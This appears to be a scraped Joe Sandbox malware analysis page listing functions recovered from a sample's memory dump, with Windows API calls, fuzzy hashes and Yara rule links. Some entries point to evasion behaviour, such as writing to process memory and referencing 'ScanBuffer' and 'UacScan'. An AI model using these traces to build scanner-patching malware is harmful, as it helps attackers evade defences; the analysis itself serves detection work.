Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: 44934a4d82a4b66548af012ee7b3ccaa6f5877b5b0bb3c3cd445c0aa4474fa05
Instruction ID: 1564cb9d29f48a793af2fe0a974be7dd80be32e41119049f396a3e45bdd925d4
Opcode Fuzzy Hash: 44934a4d82a4b66548af012ee7b3ccaa6f5877b5b0bb3c3cd445c0aa4474fa05
Instruction Fuzzy Hash: 61B1E178A516189FDB14CF99E480A9DFBF2FF89314F24D169E849AB320D730A855CF50

Function 02E4E760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 02E4E781

Part of subcall function 02E4E364: VariantClear.OLEAUT32(?), ref: 02E4E373

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: 5c17f1c356f31ba8e7bd50df0c94f8a1c926819f24e146e986dedefdd63f13c1
Instruction ID: cd185ed10c341ca2beb24ffdb2318ab9c858d0c96222017396ba3d2e927cc96e
Opcode Fuzzy Hash: 5c17f1c356f31ba8e7bd50df0c94f8a1c926819f24e146e986dedefdd63f13c1
Instruction Fuzzy Hash: AE11C62078021087CB34AF29F8C8E6637DABF8976471DF866F54A9B205DF30DC40CA61

Function 02E4E3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 02E4E43C

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 7d2832f3665fe6f30531a2e757d1daf25d1d25c363f8c1926453e356e19e8814
Instruction ID: eb672dc183d66d846dc3fef316711f7fab39934c2bdba74b477c62c901348721
Opcode Fuzzy Hash: 7d2832f3665fe6f30531a2e757d1daf25d1d25c363f8c1926453e356e19e8814
Instruction Fuzzy Hash: A43157716802089FDB15DFA8E884AEE77F9FB0D318F989565F905D3140DB34D950CBA1

Function 02E589D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 02E581CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A
Part of subcall function 02E581CC: GetModuleHandleA.KERNELBASE(?), ref: 02E5821E

Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9

Part of subcall function 02E57D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E57DEC

Part of subcall function 02E58338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02E583C2), ref: 02E583A4

FreeLibrary.KERNEL32(743E0000,00000000,00000000,00000000,00000000,02EC738C,Function_0000662C,00000004,02EC739C,02EC738C,05F5E103,00000040,02EC73A0,743E0000,00000000,00000000), ref: 02E58AAA

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
String ID:
API String ID: 1478290883-0
Opcode ID: 9c8ff9c4414aac094719a0bc0050f759f833370c5d4b8c8d778eaee0e39d4f60
Instruction ID: 6c4e06a04a0564f5638cb93767555dcb73be1bb0a886639c0ec8815fe31a8233
Opcode Fuzzy Hash: 9c8ff9c4414aac094719a0bc0050f759f833370c5d4b8c8d778eaee0e39d4f60
Instruction Fuzzy Hash: 262145707D03007FEB40F7E9ED02B5DB79E9B45700F50E4A5BE04E7680DA74A9519E18

Function 02E56D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,02E56DB9,?,?,?,00000000), ref: 02E56D99

Part of subcall function 02E44C60: SysFreeString.OLEAUT32(02E5F4A4), ref: 02E44C6E

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: 92005d793704af550eb413f0c3d531a503386cb9aad6fbadbd999931e2b3f22f
Instruction ID: 4337e1398deae6e6ebaab14fa0344a32563d52d0f4b5773196b4564eafa3c144
Opcode Fuzzy Hash: 92005d793704af550eb413f0c3d531a503386cb9aad6fbadbd999931e2b3f22f
Instruction Fuzzy Hash: D7E0E5353906187BF311FB62EC41E8E77ADDB8B700BA198B1F90093550DE316E008960

Function 02E45868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(02E40000,?,00000105), ref: 02E45886

Part of subcall function 02E45ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02E40000,02E6E790), ref: 02E45AE8
Part of subcall function 02E45ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E40000,02E6E790), ref: 02E45B06
Part of subcall function 02E45ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E40000,02E6E790), ref: 02E45B24
Part of subcall function 02E45ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02E45B42
Part of subcall function 02E45ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02E45BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02E45B8B
Part of subcall function 02E45ACC: RegQueryValueExA.ADVAPI32(?,02E45D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02E45BD1,?,80000001), ref: 02E45BA9
Part of subcall function 02E45ACC: RegCloseKey.ADVAPI32(?,02E45BD8,00000000,?,?,00000000,02E45BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E45BCB

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
Instruction ID: 3100e23623208a2f671a438eb0139867a1f6d6865e0715c82474ff6be17ef3e3
Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
Instruction Fuzzy Hash: 3CE06D71A403148FCB10DE98D8C0B4633D8AB08754F449961EC58CF346DBB0DD508BE0

Function 02E47DE0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02E47DF4

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
Instruction ID: 16beb8df71af4a83cf869469a3b11e0c23c5716355a39df0f78cefa6f2ab1a62
Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
Instruction Fuzzy Hash: C2D05BB23492507BE224965A6D44EA75BDCCBC6770F10473DF558C7181D7208C01C6B1

Function 02E47E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02E6356F,ScanString,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,ScanBuffer,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,Initialize), ref: 02E47E8B

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
Instruction ID: 8727584932c6cdd289f6f24eca7612cb31ee32a7583708388f180672899ef920
Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
Instruction Fuzzy Hash: 1DC08CF23912010A1E60A6BC3CC421942C90985138760BF65F538DA2C1DF16DC222824

Function 02E47E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02E6041F,ScanString,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,ScanString,02EC7380,02E6B7B8,UacScan,02EC7380,02E6B7B8,UacInitialize), ref: 02E47E67

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
Instruction ID: a40d13c7f135688bb70e4a6b5f158ced0aa31aa41f521529a9b7e02f311b410c
Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
Instruction Fuzzy Hash: 71C08CF03812001A5A5066BC3CC424952CA090523C364BB65B538E62E2DF2298A22854

Function 02E44C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 02E44C8B

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
Instruction ID: e5d09e7dcc667ed24b6980dbf10222a8bae681cf421925112954a05f5d2a9dfc
Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
Instruction Fuzzy Hash: A5C012A278023057FF215699BCC079262CC9B45298B1850A1A408DB290EB60990056A4

Function 02E6C35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,02E6C350,00000000,00000001), ref: 02E6C36C

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: a15ecdcad71acb3597fdffa360b0522faeb741619125ff35ca14361a124e6f78
Instruction ID: 6621c9347dfb77b637dea4981ea03a9c17c3ad05b5aa184c83838a4822056bf6
Opcode Fuzzy Hash: a15ecdcad71acb3597fdffa360b0522faeb741619125ff35ca14361a124e6f78
Instruction Fuzzy Hash: 4FC02BF03C13003AFD0041609CC3F33118CC301740F207002B700EE1C1C1E348004E14

Function 02E44C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 02E44C3F

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
Instruction ID: 3efbae91d522e8acb434f660c4dfb3c43025a7791c847afa2b02f3a9f9078594
Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
Instruction Fuzzy Hash: 33B092243C820515FA1826633E007B2004C0B4128AF88B051AF18C80D1FE00C101983A

Function 02E44C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 02E44C57

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
Instruction ID: 2b14e15d6c9d7b46f3a49508217947bb5ad813e25674eb81a6d26f70b3aab079
Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
Instruction Fuzzy Hash: 7CA0245C140313055F07331C101011F11733FC03443CCD0D415044D0404F3540007C34

Function 02E415CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02E41A03), ref: 02E415E2

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b30bc34a4d56a9abd2b36d9f22482335c3938521e83a8bc939f2f327ba9c6a0a
Instruction ID: f2771f649d00499299764ab4772ba1d1558e4662ec75effde1178552e39e9699
Opcode Fuzzy Hash: b30bc34a4d56a9abd2b36d9f22482335c3938521e83a8bc939f2f327ba9c6a0a
Instruction Fuzzy Hash: E5F04FF0BC13004FDB05CFBAA9543017AE6E78A344F60C579E609DB3C4EB7184428B00

Function 02E41682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02E416A4

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bb754fab10f8bcd42861a921fbce6e611fb1069b5be44fa3e56baa615b44227b
Instruction ID: 8943d4fdaa57b61ba19e849684d4231daf2ba4419869c9200abe2d26a5b800e6
Opcode Fuzzy Hash: bb754fab10f8bcd42861a921fbce6e611fb1069b5be44fa3e56baa615b44227b
Instruction Fuzzy Hash: B0F0B4B2B807956BDB109F9AEC80783BB98FB80314F554579FA0C9B340D770A851CB98

Function 02E416E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02E41FE4), ref: 02E41704

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: ea149944f706ca5fa495e159065429b8279a865cdd1df25adee8ed7c8ac5ab19
Instruction ID: 945dcab7d11842163e8e2f479a010f78c12894e6bdffdc5e346239c63916c87c
Opcode Fuzzy Hash: ea149944f706ca5fa495e159065429b8279a865cdd1df25adee8ed7c8ac5ab19
Instruction Fuzzy Hash: D6E026753803006FDF100F7A6C84B026BCCEB45214F249475F508CF242CA60E8508B24

Non-executed Functions

Function 02E5AB1C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02E5ADA3,?,?,02E5AE35,00000000,02E5AF11), ref: 02E5AB30
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02E5AB48
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02E5AB5A
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02E5AB6C
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02E5AB7E
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02E5AB90
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02E5ABA2
GetProcAddress.KERNEL32(00000000,Process32First), ref: 02E5ABB4
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02E5ABC6
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02E5ABD8
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02E5ABEA
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02E5ABFC
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02E5AC0E
GetProcAddress.KERNEL32(00000000,Module32First), ref: 02E5AC20
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02E5AC32
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02E5AC44
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02E5AC56

Strings

Process32FirstW, xrefs: 02E5ABD0
Heap32First, xrefs: 02E5AB76
Process32First, xrefs: 02E5ABAC
Heap32ListFirst, xrefs: 02E5AB52
kernel32.dll, xrefs: 02E5AB2B
Heap32Next, xrefs: 02E5AB88
CreateToolhelp32Snapshot, xrefs: 02E5AB40
Module32NextW, xrefs: 02E5AC4E
Process32Next, xrefs: 02E5ABBE
Thread32Next, xrefs: 02E5AC06
Heap32ListNext, xrefs: 02E5AB64
Module32FirstW, xrefs: 02E5AC3C
Module32Next, xrefs: 02E5AC2A
Process32NextW, xrefs: 02E5ABE2
Toolhelp32ReadProcessMemory, xrefs: 02E5AB9A
Module32First, xrefs: 02E5AC18
Thread32First, xrefs: 02E5ABF4

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: 16301d0a1f15d9eff565039a648d85caf66d739e82ae07ce10ed11d026265495
Instruction ID: af2d20a187aa5b7b594f9a2f5edf281b7e88a04c0c7eb61650b4f665739195c2
Opcode Fuzzy Hash: 16301d0a1f15d9eff565039a648d85caf66d739e82ae07ce10ed11d026265495
Instruction Fuzzy Hash: 6631DFB09D07609FEF00EBF5A885A2977ADAB17601750AEB5BC01DF304EB74A495CF12

Function 02E45908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,02E46C14,02E40000,02E6E790), ref: 02E45925
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02E4593C
lstrcpynA.KERNEL32(?,?,?), ref: 02E4596C
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02E46C14,02E40000,02E6E790), ref: 02E459D0
